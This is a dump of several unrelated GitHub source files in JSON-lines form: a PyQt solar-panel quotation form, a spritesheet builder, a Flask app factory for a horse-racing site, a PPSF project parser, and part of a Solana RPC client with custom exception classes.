self.w.verticalLayout_25.setSpacing(2)\n self.w.verticalLayout_25.setObjectName('verticalLayout_25')\n self.w.labelOrigin = QtWidgets.QLabel(self.w.groupGeographical)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelOrigin.setFont(font)\n self.w.labelOrigin.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelOrigin.setObjectName('labelOrigin')\n self.w.verticalLayout_25.addWidget(self.w.labelOrigin)\n self.w.comboOrigin = SearchCombo(self.w.groupGeographical)\n self.w.comboOrigin.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setWeight(50)\n font.setBold(False)\n self.w.comboOrigin.setFont(font)\n self.w.comboOrigin.setObjectName('comboOrigin')\n self.w.verticalLayout_25.addWidget(self.w.comboOrigin)\n self.w.verticalLayout_7.addLayout(self.w.verticalLayout_25)\n self.w.verticalLayout_26 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_26.setSpacing(2)\n self.w.verticalLayout_26.setObjectName('verticalLayout_26')\n self.w.labelDestination = QtWidgets.QLabel(self.w.groupGeographical)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelDestination.setFont(font)\n self.w.labelDestination.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelDestination.setObjectName('labelDestination')\n self.w.verticalLayout_26.addWidget(self.w.labelDestination)\n self.w.comboDestination = SearchCombo(self.w.groupGeographical)\n self.w.comboDestination.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setWeight(50)\n font.setBold(False)\n self.w.comboDestination.setFont(font)\n self.w.comboDestination.setObjectName('comboDestination')\n self.w.verticalLayout_26.addWidget(self.w.comboDestination)\n self.w.verticalLayout_7.addLayout(self.w.verticalLayout_26)\n self.w.verticalLayout_5.addWidget(self.w.groupGeographical)\n self.w.horizontalLayout.addLayout(self.w.verticalLayout_5)\n spacerItem6 = QtWidgets.QSpacerItem(35, 0, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.w.horizontalLayout.addItem(spacerItem6)\n self.w.verticalLayout_11.addLayout(self.w.horizontalLayout)\n spacerItem7 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\n self.w.verticalLayout_11.addItem(spacerItem7)\n self.w.priceBarChart = PriceBarChart(self.my_strings)\n self.w.verticalLayout_11.addWidget(self.w.priceBarChart)\n spacerItem8 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\n self.w.verticalLayout_11.addItem(spacerItem8)\n self.w.verticalLayout_11.setStretch(2, 1)\n self.w.horizontalLayout_7.addLayout(self.w.verticalLayout_11)\n spacerItem9 = QtWidgets.QSpacerItem(50, 50, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.w.horizontalLayout_7.addItem(spacerItem9)\n self.w.horizontalLayout_7.setStretch(0, 2)\n self.w.horizontalLayout_7.setStretch(1, 4)\n self.w.horizontalLayout_7.setStretch(2, 2)\n self.w.horizontalLayout_7.setStretch(3, 4)\n self.w.horizontalLayout_7.setStretch(5, 5)\n self.w.horizontalLayout_7.setStretch(6, 2)\n self.w.scrollArea.setWidget(self.w.scrollAreaWidgetContents)\n self.w.verticalLayout.addWidget(self.w.scrollArea)\n self.w.horizontalLayout_13 = QtWidgets.QHBoxLayout()\n self.w.horizontalLayout_13.setSpacing(30)\n self.w.horizontalLayout_13.setObjectName('horizontalLayout_13')\n spacerItem10 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.w.horizontalLayout_13.addItem(spacerItem10)\n self.w.buttonNew = QtWidgets.QToolButton(self.w.centralWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.w.buttonNew.sizePolicy().hasHeightForWidth())\n self.w.buttonNew.setSizePolicy(sizePolicy)\n self.w.buttonNew.setMaximumSize(QtCore.QSize(200, 16777215))\n font = QtGui.QFont()\n font.setPointSize(13)\n self.w.buttonNew.setFont(font)\n self.w.buttonNew.setIconSize(QtCore.QSize(40, 40))\n self.w.buttonNew.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)\n self.w.buttonNew.setObjectName('buttonNew')\n self.w.horizontalLayout_13.addWidget(self.w.buttonNew)\n self.w.buttonOverwrite = QtWidgets.QToolButton(self.w.centralWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.w.buttonOverwrite.sizePolicy().hasHeightForWidth())\n self.w.buttonOverwrite.setSizePolicy(sizePolicy)\n self.w.buttonOverwrite.setMaximumSize(QtCore.QSize(200, 16777215))\n font = QtGui.QFont()\n font.setPointSize(13)\n self.w.buttonOverwrite.setFont(font)\n self.w.buttonOverwrite.setIconSize(QtCore.QSize(40, 40))\n self.w.buttonOverwrite.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)\n self.w.buttonOverwrite.setObjectName('buttonOverwrite')\n self.w.horizontalLayout_13.addWidget(self.w.buttonOverwrite)\n spacerItem11 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.w.horizontalLayout_13.addItem(spacerItem11)\n self.w.verticalLayout.addLayout(self.w.horizontalLayout_13)\n spacerItem12 = QtWidgets.QSpacerItem(10, 10, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n self.w.verticalLayout.addItem(spacerItem12)\n self.w.setCentralWidget(self.w.centralWidget)\n\n self.w.labelTitle.setText(self.my_strings.title_panel_quotation)\n self.w.labelCompany.setText(f\"{color_gray(self.my_strings.label_company)} {color_red('*')}\")\n self.w.labelMark.setText(color_gray(self.my_strings.label_mark))\n self.w.labelTotalPower.setText(f\"{color_gray(self.my_strings.label_total_power)} {color_red('*')}\")\n self.w.labelPrice.setText(f\"{color_gray(self.my_strings.label_price)} {color_red('*')}\")\n self.w.labelDateQuotation.setText(color_gray(self.my_strings.label_date_quotation))\n self.w.labelDateValidity.setText(color_gray(self.my_strings.label_date_validity))\n self.w.labelNContacts.setText(color_gray(self.my_strings.label_n_contacts))\n self.w.labelUser.setText(f\"{color_gray(self.my_strings.label_user)} {color_red('*')}\")\n self.w.labelObservations.setText(color_gray(self.my_strings.label_observations))\n self.w.labelPanelType.setText(color_gray(self.my_strings.label_type))\n self.w.labelCells.setText(color_gray(self.my_strings.label_cells))\n self.w.labelPanelPower.setText(f\"{color_gray(self.my_strings.label_panel_power)} {color_red('*')}\")\n self.w.labelEfficiency.setText(color_gray(self.my_strings.label_efficiency))\n self.w.labelWarrantyProduct.setText(color_gray(self.my_strings.label_warranty_product))\n self.w.labelWarrantyPerformance.setText(color_gray(self.my_strings.label_warranty_performance))\n self.w.labelCertificates.setText(color_gray(self.my_strings.label_certificates))\n self.w.labelIncoterm.setText(color_gray(self.my_strings.label_incoterm))\n self.w.labelMadeIn.setText(color_gray(self.my_strings.label_made_in))\n self.w.labelOrigin.setText(color_gray(self.my_strings.label_origin))\n self.w.labelDestination.setText(color_gray(self.my_strings.label_destination))\n\n self.w.buttonBack.setIcon(QtGui.QIcon(url_back))\n self.w.buttonBack.setIconSize(QtCore.QSize(32, 32))\n self.w.buttonNew.setIcon(QtGui.QIcon(url_save))\n self.w.buttonNew.setIconSize(QtCore.QSize(40, 40))\n self.w.buttonNew.setText(self.my_strings.button_new)\n self.w.buttonOverwrite.setIcon(QtGui.QIcon(url_save))\n self.w.buttonOverwrite.setIconSize(QtCore.QSize(40, 40))\n self.w.buttonOverwrite.setText(self.my_strings.button_overwrite)\n self.w.buttonOverwrite.setVisible(False)\n self.w.buttonAddCompany.setIcon(QtGui.QIcon(url_plus))\n self.w.buttonAddCompany.setIconSize(QtCore.QSize(12, 12))\n\n self.w.radioPositiveTolerance.setText(self.my_strings.radio_positive)\n self.w.radioNegativeTolerance.setText(self.my_strings.radio_negative)\n\n self.w.spinTotalPower.setSuffix(' kW')\n self.w.spinPrice.setSuffix(' €/W')\n self.w.spinPanelPower.setSuffix(' W')\n self.w.spinEfficiency.setSuffix(' %')\n self._update_suffix_year()\n\n today = QtCore.QDate.currentDate()\n self.w.dateQuotation.setDate(today)\n self.w.dateValidity.setDate(today.addDays(30))\n\n self.w.groupGeneral.setTitle(self.my_strings.group_general)\n self.w.groupPanel.setTitle(self.my_strings.group_panel)\n self.w.groupGeographical.setTitle(self.my_strings.group_geographical)\n self.w.groupTolerance.setTitle(self.my_strings.group_tolerance)\n self.w.groupTolerance.setStyleSheet('QGroupBox:title {color: #555555}')\n\n # Coloring\n self.w.centralWidget.setStyleSheet('.QWidget{background-color: rgb(238, 240, 245)}')\n\n def connect_signals(self, controller):\n super(GPanelQuotation, self).connect_signals(controller)\n super(GPriceBarChart, self).connect_signals(controller)\n super(GPanel, self).connect_signals(controller)\n\n self.w.comboCompany.currentTextChanged.connect(lambda: self.w.comboCompany.validate_hard())\n self.w.comboPanelType.currentTextChanged.connect(lambda: self.w.comboPanelType.validate_soft())\n self.w.comboPanelType.currentTextChanged.connect(lambda: controller.update_current_type_average())\n self.w.comboCells.currentTextChanged.connect(lambda: self.w.comboCells.validate_soft())\n\n self.w.dateQuotation.dateChanged.connect(controller.changed_date)\n self.w.dateValidity.dateChanged.connect(controller.changed_date)\n\n @property\n def cells(self):\n return self.w.comboCells.currentText()\n\n @cells.setter\n def cells(self, text):\n self.w.comboCells.setCurrentText(text)\n\n @property\n def data(self):\n Data = namedtuple('Data',\n ('company', 'mark', 'total_power', 'price', 'date_quotation', 'date_validity', 'n_contacts',\n 'user', 'observations', 'panel_type', 'cells', 'panel_power', 'efficiency', 'tolerance',\n 'warranty_product', 'warranty_performance', 'certificates', 'incoterm', 'made_in', 'origin',\n 'destination')\n )\n return Data(\n self.company,\n self.mark,\n self.total_power,\n self.price,\n self.date_quotation,\n self.date_validity,\n self.n_contacts,\n self.user,\n self.observations,\n\n self.panel_type,\n self.cells,\n self.panel_power,\n self.efficiency,\n self.tolerance,\n self.warranty_product,\n self.warranty_performance,\n self.checked_certificates,\n\n self.incoterm,\n self.made_in,\n self.origin,\n self.destination\n )\n\n @property\n def panel_type(self):\n return self.w.comboPanelType.currentText()\n\n @panel_type.setter\n def panel_type(self, text):\n self.w.comboPanelType.setCurrentText(text)\n\n def load_initial_data(self,\n company_names,\n mark_names,\n date_quotation,\n date_validity,\n user_names,\n last_user,\n panel_type_names,\n cells_numbers,\n certificate_names,\n incoterm_names,\n place_names,\n default):\n self.w.comboCompany.items = company_names\n self.w.comboMark.items = mark_names\n self.w.comboUser.items = user_names\n self.w.comboPanelType.items = panel_type_names\n self.w.comboCells.items = cells_numbers\n self.w.buttonCertificates.items = certificate_names\n self.w.comboIncoterm.items = incoterm_names\n self.w.comboMadeIn.items = place_names\n self.w.comboOrigin.items = place_names\n self.w.comboDestination.items = place_names\n\n if default:\n self.date_quotation = date_quotation\n self.date_validity = date_validity\n if last_user:\n self.user = last_user.name\n\n self.w.spinTotalPower.validate_hard()\n self.w.spinPrice.validate_hard()\n self.w.comboUser.validate_hard()\n self.w.spinPanelPower.validate_hard()\n else:\n self.w.comboMark.validate_soft()\n self.w.comboUser.validate_soft()\n self.w.comboPanelType.validate_soft()\n self.w.comboCells.validate_soft()\n self.w.comboIncoterm.validate_soft()\n self.w.comboMadeIn.validate_soft()\n self.w.comboOrigin.validate_soft()\n self.w.comboDestination.validate_soft()\n\n def load_item_data(self, panel_quotation):\n self.company = panel_quotation.company\n self.mark = panel_quotation.mark\n self.total_power = panel_quotation.total_power\n self.price = panel_quotation.price\n self.date_quotation = panel_quotation.date_quotation\n self.date_validity = panel_quotation.date_validity\n self.n_contacts = panel_quotation.n_contacts\n self.user = panel_quotation.user\n self.observations = panel_quotation.observations\n\n self.panel_type = panel_quotation.panel_type\n self.cells = panel_quotation.cells\n self.checked_certificates = panel_quotation.certificates\n self.panel_power = panel_quotation.panel_power\n self.efficiency = panel_quotation.efficiency\n self.tolerance = panel_quotation.tolerance\n self.warranty_product = panel_quotation.warranty_product\n self.warranty_performance = panel_quotation.warranty_performance\n self.checked_certificates = panel_quotation.certificates\n\n self.incoterm = panel_quotation.incoterm\n self.made_in = panel_quotation.made_in\n self.origin = panel_quotation.origin\n self.destination = panel_quotation.destination\n","repo_name":"AlberLC/complete-qt-app","sub_path":"guis/g_panel_quotation.py","file_name":"g_panel_quotation.py","file_ext":"py","file_size_in_byte":45892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23937235530","text":"from settings import *\n\nimport numpy as np\nimport cv2\nimport os\nimport math\nimport subprocess\nfrom tqdm import tqdm\n\nRE_STRIP = False\n\nANIMS_TO_JOIN = [ \"srun\", \"frun\", \"brun\" ]\nDO_ALL = False\n\n# ANIMS_TO_JOIN = [ \"idle\", \"srun-interp\", \"frun-interp\", \"brun-interp\" ]\n# DO_ALL = True\n\nSPRITESHEET_RESCALE = 0.5 # \nSPRITESHEET_MAX_WIDTH = 16384 # \n\ndef create_spritesheet(imgs):\n row_count = 1\n row_size = len(imgs)\n h, w = imgs[0].shape[0], sum([img.shape[1] for img in imgs])\n dy = h\n\n new_w = w\n while new_w > SPRITESHEET_MAX_WIDTH:\n row_count *= 2\n row_size = math.ceil(len(imgs) / float(row_count))\n new_w = row_size * imgs[0].shape[0]\n h, w = h * row_count, new_w\n\n print(f\"Final spritesheet size: {row_size}x{row_count} ({w}x{h})\")\n\n output_img = np.zeros((h, w, imgs[0].shape[2]))\n img_i = 0\n for row_i in range(row_count):\n x = 0\n for _ in range(row_size):\n img = imgs[img_i]\n dx = img.shape[1]\n\n output_img[dy*row_i:dy*(row_i+1),x:x+dx] = img\n\n x += dx\n img_i += 1\n if img_i >= len(imgs): break\n if img_i >= len(imgs): break\n\n return output_img\n\ndef main():\n assert os.path.exists(RENDERS_PATH), f\"Could not find renders root, run render.py or check settings, settings.py says it is RENDERS_PATH='{RENDERS_PATH}'\"\n \n sprites = []\n for anim_folder in ANIMS_TO_JOIN:\n render_root = f\"{RENDERS_PATH}/{anim_folder}\"\n assert os.path.exists(render_root), f\"Could not find render_root '{render_root}', check ANIMS_TO_JOIN variable or run render.py\"\n\n for iter in range(1, 1000):\n touch_file_path = f\"{render_root}/.iter{iter:03}\"\n if not os.path.exists(touch_file_path): break\n iter_str = f\"iter{(iter - 1):03}\"\n print(f\"{anim_folder}: {iter_str}\")\n\n files = [f for f in os.listdir(render_root) if (DO_ALL or f\"{iter_str}_n_\" in f) and (\"_s.png\" not in f and \"_s_\" not in f)]\n print(f\" {files}\")\n for file in tqdm(files):\n stripped = f\"{render_root}/\" + (file.replace(\".png\", \"_s.png\") if DO_ALL else file.replace(f\"{iter_str}_n_\", f\"{iter_str}_s_\"))\n assert file not in stripped, \"did not change filename\"\n if RE_STRIP or not os.path.exists(stripped):\n subprocess.call([\"rembg\", \"i\", f\"{render_root}/{file}\", stripped])\n img = cv2.imread(stripped, cv2.IMREAD_UNCHANGED)\n assert img is not None, f\"Stripped img was not loaded properly, tried with path '{stripped}'\"\n sprites.append(cv2.resize(img, (int(SPRITESHEET_RESCALE*img.shape[1]), int(SPRITESHEET_RESCALE*img.shape[0]))))\n \n sheet = create_spritesheet(sprites)\n cv2.imwrite(f\"{WORKSPACE}/{SPRITESHEET_NAME}\", sheet)\n\nif __name__ == \"__main__\":\n main()","repo_name":"tobias17/sd-exodia","sub_path":"spritesheet.py","file_name":"spritesheet.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"61"} +{"seq_id":"41750047126","text":"from flask import Flask, g, redirect, url_for, render_template\nimport os\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__, instance_relative_config=True)\n\n app.config.from_mapping(\n SECRET_KEY=os.environ['SECRET_KEY'],\n )\n\n if test_config is None:\n # load the instance config, if it exists, when not testing\n app.config.from_pyfile('config.py', silent=True)\n else:\n # load the test config if passed in\n app.config.from_mapping(test_config)\n\n # ensure the instance folder exists\n try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n\n from . import db\n db.init_app(app)\n\n # Register blueprints\n from . import auth\n app.register_blueprint(auth.bp)\n app.add_url_rule('/auth', endpoint='auth_index')\n\n from . import admin\n app.register_blueprint(admin.bp)\n app.add_url_rule('/admin', endpoint='admin.login')\n\n from . import bet\n app.register_blueprint(bet.bp)\n\n from . import leaderboard\n app.register_blueprint(leaderboard.bp)\n app.add_url_rule('/leaderboard', endpoint='leaderboard')\n\n from . import race\n app.register_blueprint(race.bp)\n\n # Home page\n @app.route('/')\n def index():\n if g.user == None:\n return redirect(url_for('auth_index'))\n return redirect(url_for('leaderboard'))\n\n # Error handlers\n @app.errorhandler(404)\n def page_not_found(error):\n return render_template('errors/404.html'), 404\n\n @app.errorhandler(403)\n def permission_denied(error):\n return render_template('errors/403.html'), 403\n\n return app","repo_name":"madisonkeene/horseracing","sub_path":"horseracing/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28908239856","text":"import dataclasses\nfrom typing import Optional\n\nfrom libresvip.model.base import (\n InstrumentalTrack,\n Note,\n Project,\n SingingTrack,\n SongTempo,\n TimeSignature,\n)\n\nfrom .model import (\n PpsfAudioTrackItem,\n PpsfDvlTrackEvent,\n PpsfDvlTrackItem,\n PpsfMeters,\n PpsfProject,\n PpsfTempos,\n)\nfrom .options import InputOptions\n\n\n@dataclasses.dataclass\nclass PiaproStudioParser:\n options: InputOptions\n\n def parse_project(self, ppsf_project: PpsfProject) -> Project:\n time_signatures = self.parse_time_signatures(ppsf_project.ppsf.project.meter)\n tempos = self.parse_tempos(ppsf_project.ppsf.project.tempo)\n singing_tracks = self.parse_singing_tracks(ppsf_project.ppsf.project.dvl_track)\n instrumental_tracks = self.parse_instrumental_tracks(\n ppsf_project.ppsf.project.audio_track\n )\n return Project(\n time_signature_list=time_signatures,\n song_tempo_list=tempos,\n track_list=singing_tracks + instrumental_tracks,\n )\n\n def parse_time_signatures(self, ppsf_meters: PpsfMeters) -> list[TimeSignature]:\n time_signatures = []\n first_time_signature = TimeSignature(\n numerator=ppsf_meters.const.nume,\n denominator=ppsf_meters.const.denomi,\n )\n if ppsf_meters.use_sequence:\n for meter in ppsf_meters.sequence:\n time_signatures.append(\n TimeSignature(\n numerator=meter.nume,\n denominator=meter.denomi,\n bar_index=meter.measure,\n )\n )\n if not len(time_signatures) or time_signatures[0].bar_index != 0:\n time_signatures.insert(0, first_time_signature)\n return time_signatures\n\n def parse_tempos(self, ppsf_tempos: PpsfTempos) -> list[SongTempo]:\n tempos = []\n first_tempo = SongTempo(bpm=ppsf_tempos.const / 10000, position=0)\n if ppsf_tempos.use_sequence:\n for tempo in ppsf_tempos.sequence:\n tempos.append(SongTempo(bpm=tempo.value / 10000, position=tempo.tick))\n if not len(tempos) or tempos[0].position != 0:\n tempos.insert(0, first_tempo)\n return tempos\n\n def parse_instrumental_tracks(\n self, ppsf_audio_tracks: list[PpsfAudioTrackItem]\n ) -> list[InstrumentalTrack]:\n tracks = []\n for track in ppsf_audio_tracks:\n for i, event in enumerate(track.events):\n instrumental_track = InstrumentalTrack(\n title=f\"{track.name} {i + 1}\",\n audio_file_path=event.file_audio_data.file_path,\n offset=event.tick_pos,\n )\n tracks.append(instrumental_track)\n return tracks\n\n def parse_singing_tracks(\n self, ppsf_dvl_tracks: Optional[list[PpsfDvlTrackItem]]\n ) -> list[SingingTrack]:\n tracks = []\n if ppsf_dvl_tracks is not None:\n for track in ppsf_dvl_tracks:\n singing_track = SingingTrack(\n title=track.name,\n ai_singer_name=track.singer.singer_name,\n note_list=self.parse_notes(track.events),\n )\n tracks.append(singing_track)\n return tracks\n\n def parse_notes(self, ppsf_dvl_track_events: list[PpsfDvlTrackEvent]) -> list[Note]:\n return [\n Note(\n key_number=event.note_number,\n start_pos=event.pos,\n length=event.length,\n lyric=event.lyric,\n )\n for event in ppsf_dvl_track_events\n if event.enabled\n ]\n","repo_name":"SoulMelody/LibreSVIP","sub_path":"libresvip/plugins/ppsf/piapro_studio_parser.py","file_name":"piapro_studio_parser.py","file_ext":"py","file_size_in_byte":3730,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"23527457070","text":"import datetime\nimport json\nimport logging\nimport requests\nimport time\nimport typing\n\n\nfrom base64 import b64decode\nfrom decimal import Decimal\nfrom solana.blockhash import Blockhash, BlockhashCache\nfrom solana.keypair import Keypair\nfrom solana.publickey import PublicKey\nfrom solana.rpc.api import Client\nfrom solana.rpc.commitment import Commitment\nfrom solana.rpc.providers.http import HTTPProvider\nfrom solana.rpc.types import DataSliceOpts, MemcmpOpts, RPCMethod, RPCResponse, TokenAccountOpts, TxOpts\nfrom solana.transaction import Transaction\n\nfrom .constants import SOL_DECIMAL_DIVISOR\nfrom .instructionreporter import InstructionReporter\nfrom .logmessages import expand_log_messages\n\n\n# # ЁЯен ClientException class\n#\n# A `ClientException` exception base class that allows trapping and handling rate limiting\n# independent of other error handling.\n#\nclass ClientException(Exception):\n def __init__(self, message: str, name: str, cluster_url: str) -> None:\n super().__init__(message)\n self.message: str = message\n self.name: str = name\n self.cluster_url: str = cluster_url\n\n def __str__(self) -> str:\n return f\"┬л {type(self)} '{self.message}' from '{self.name}' on {self.cluster_url} ┬╗\"\n\n def __repr__(self) -> str:\n return f\"{self}\"\n\n\n# # ЁЯен RateLimitException class\n#\n# A `RateLimitException` exception base class that allows trapping and handling rate limiting\n# independent of other error handling.\n#\nclass RateLimitException(ClientException):\n pass\n\n\n# # ЁЯен TooMuchBandwidthRateLimitException class\n#\n# A `TooMuchBandwidthRateLimitException` exception that specialises the `RateLimitException`\n# for when too much bandwidth has been consumed.\n#\nclass TooMuchBandwidthRateLimitException(RateLimitException):\n pass\n\n\n# # ЁЯен TooManyRequestsRateLimitException class\n#\n# A `TooManyRequestsRateLimitException` exception that specialises the `RateLimitException`\n# for when too many requests have been sent in a short time.\n#\nclass TooManyRequestsRateLimitException(RateLimitException):\n pass\n\n\n# # ЁЯен BlockhashNotFoundException class\n#\n# A `BlockhashNotFoundException` exception allows trapping and handling exceptions when a blockhash is sent that\n# the node doesn't understand. This can happen when the blockhash is too old (and the node no longer\n# considers it 'recent') or when it's too new (and hasn't yet made it to the node that is responding).\n#\nclass BlockhashNotFoundException(ClientException):\n def __init__(self, name: str, cluster_url: str, blockhash: typing.Optional[Blockhash] = None) -> None:\n message: str = f\"Blockhash '{blockhash}' not found on {cluster_url}.\"\n super().__init__(message, name, cluster_url)\n self.blockhash: typing.Optional[Blockhash] = blockhash\n\n def __str__(self) -> str:\n return f\"┬л BlockhashNotFoundException '{self.name}' [{self.blockhash}] on {self.cluster_url} ┬╗\"\n\n\n# # ЁЯен NodeIsBehindException class\n#\n# A `NodeIsBehindException` exception allows trapping and handling exceptions when a node is behind by too\n# many slots.\n#\nclass NodeIsBehindException(ClientException):\n def __init__(self, name: str, cluster_url: str, slots_behind: int) -> None:\n message: str = f\"Node is behind by {slots_behind} slots.\"\n super().__init__(message, name, cluster_url)\n self.slots_behind: int = slots_behind\n\n def __str__(self) -> str:\n return f\"┬л NodeIsBehindException '{self.name}' [behind by {self.slots_behind} slots] on {self.cluster_url} ┬╗\"\n\n\n# # ЁЯен FailedToFetchBlockhashException class\n#\n# A `FailedToFetchBlockhashException` exception allows trapping and handling exceptions when we fail\n# to fetch a recent or distinct blockhash.\n#\nclass FailedToFetchBlockhashException(ClientException):\n def __init__(self, message: str, name: str, cluster_url: str, pauses: typing.Sequence[float]) -> None:\n super().__init__(message, name, cluster_url)\n self.pauses: typing.Sequence[float] = pauses\n\n def __str__(self) -> str:\n if len(self.pauses) == 0:\n return f\"┬л FailedToFetchBlockhashException '{self.name}' Failed to get recent blockhash on {self.cluster_url} ┬╗\"\n\n pauses_text = \",\".join(f\"{pause}\" for pause in self.pauses[:-1])\n return f\"┬л FailedToFetchBlockhashException '{self.name}' Failed to get a fresh, recent blockhash after {len(self.pauses)} attempts - paused {pauses_text} seconds between attempts on {self.cluster_url} ┬╗\"\n\n\n# # ЁЯен TransactionException class\n#\n# A `TransactionException` exception that can provide additional error data, or at least better output\n# of problems at the right place.\n#\nclass TransactionException(ClientException):\n def __init__(self, transaction: typing.Optional[Transaction], message: str, code: int, name: str, cluster_url: str, rpc_method: str, request_text: str, response_text: str, accounts: typing.Union[str, typing.List[str], None], errors: typing.Union[str, typing.List[str], None], logs: typing.Union[str, typing.List[str], None], instruction_reporter: InstructionReporter = InstructionReporter()) -> None:\n super().__init__(message, name, cluster_url)\n self.transaction: typing.Optional[Transaction] = transaction\n self.code: int = code\n self.rpc_method: str = rpc_method\n self.request_text: str = request_text\n self.response_text: str = response_text\n\n def _ensure_list(item: typing.Union[str, typing.List[str], None]) -> typing.List[str]:\n if item is None:\n return []\n if isinstance(item, str):\n return [item]\n if isinstance(item, list):\n return item\n return [f\"{item}\"]\n self.accounts: typing.Sequence[str] = _ensure_list(accounts)\n self.errors: typing.Sequence[str] = _ensure_list(errors)\n self.logs: typing.Sequence[str] = expand_log_messages(_ensure_list(logs))\n self.instruction_reporter: InstructionReporter = instruction_reporter\n\n def __str__(self) -> str:\n request_details: str = \"\"\n response_details: str = \"\"\n if logging.DEBUG >= logging.root.level:\n request_details = f\"\"\"\n Request:\n {self.request_text}\"\"\"\n response_details = f\"\"\"\n Response:\n {self.response_text}\"\"\"\n transaction_details = \"\"\n if self.transaction is not None:\n instruction_details = \"\\n\".join(list(map(self.instruction_reporter.report, self.transaction.instructions)))\n transaction_details = \"\\n Instructions:\\n \" + instruction_details.replace(\"\\n\", \"\\n \")\n accounts = \"No Accounts\"\n if len(self.accounts) > 0:\n accounts = \"\\n \".join([f\"{item}\".replace(\"\\n\", \"\\n \") for item in self.accounts])\n errors = \"No Errors\"\n if len(self.errors) > 0:\n errors = \"\\n \".join([f\"{item}\".replace(\"\\n\", \"\\n \") for item in self.errors])\n logs = \"No Logs\"\n if len(self.logs) > 0:\n logs = \"\\n \".join([f\"{item}\".replace(\"\\n\", \"\\n \") for item in self.logs])\n return f\"\"\"┬л ЁЭЪГЁЭЪЫЁЭЪКЁЭЪЧЁЭЪЬЁЭЪКЁЭЪМЁЭЪЭЁЭЪТЁЭЪШЁЭЪЧЁЭЩ┤ЁЭЪбЁЭЪМЁЭЪОЁЭЪЩЁЭЪЭЁЭЪТЁЭЪШЁЭЪЧ in '{self.name}' [{self.rpc_method}]: {self.code}:: {self.message}{transaction_details}\n Accounts:\n {accounts}\n Errors:\n {errors}\n Logs:\n {logs}{request_details}{response_details}\n┬╗\"\"\"\n\n def __repr__(self) -> str:\n return f\"{self}\"\n\n\nUnspecifiedCommitment = Commitment(\"unspecified\")\nUnspecifiedEncoding = \"unspecified\"\n\n\n# # ЁЯен ErrorHandlingProvider class\n#\n# A `ErrorHandlingProvider` extends the HTTPProvider with better error handling.\n#\nclass ErrorHandlingProvider(HTTPProvider):\n def __init__(self, name: str, cluster_url: str, instruction_reporter: InstructionReporter):\n super().__init__(cluster_url)\n self.name: str = name\n self.cluster_url: str = cluster_url\n self.instruction_reporter: InstructionReporter = instruction_reporter\n\n def make_request(self, method: RPCMethod, *params: typing.Any) -> RPCResponse:\n # This is the entire method in HTTPProvider that we're overriding here:\n #\n # \"\"\"Make an HTTP request to an http rpc endpoint.\"\"\"\n # request_kwargs = self._before_request(method=method, params=params, is_async=False)\n # raw_response = requests.post(**request_kwargs)\n # return self._after_request(raw_response=raw_response, method=method)\n\n request_kwargs = self._before_request(method=method, params=params, is_async=False)\n raw_response = requests.post(**request_kwargs)\n\n # Some custom exceptions specifically for rate-limiting. This allows calling code to handle this\n # specific case if they so choose.\n #\n # \"You will see HTTP respose codes 429 for too many requests or 413 for too much bandwidth.\"\n if raw_response.status_code == 413:\n raise TooMuchBandwidthRateLimitException(\n f\"Rate limited (too much bandwidth) calling method '{method}'.\", self.name, self.cluster_url)\n elif raw_response.status_code == 429:\n raise TooManyRequestsRateLimitException(\n f\"Rate limited (too many requests) calling method '{method}'.\", self.name, self.cluster_url)\n\n # Not a rate-limit problem, but maybe there was some other error?\n raw_response.raise_for_status()\n\n # All seems OK, but maybe the server returned an error? If so, try to pass on as much\n # information as we can.\n response_text: str = raw_response.text\n response: typing.Dict[str, typing.Any] = json.loads(response_text)\n if \"error\" in response:\n if response[\"error\"] is str:\n message: str = typing.cast(str, response[\"error\"])\n raise ClientException(f\"Transaction failed: '{message}'\", self.name, self.cluster_url)\n else:\n error = response[\"error\"]\n error_message: str = error[\"message\"] if \"message\" in error else \"No message\"\n error_data: typing.Dict[str, typing.Any] = error[\"data\"] if \"data\" in error else {}\n error_accounts = error_data[\"accounts\"] if \"accounts\" in error_data else \"No accounts\"\n error_code: int = error[\"code\"] if \"code\" in error else -1\n error_err = error_data[\"err\"] if \"err\" in error_data else \"No error text returned\"\n 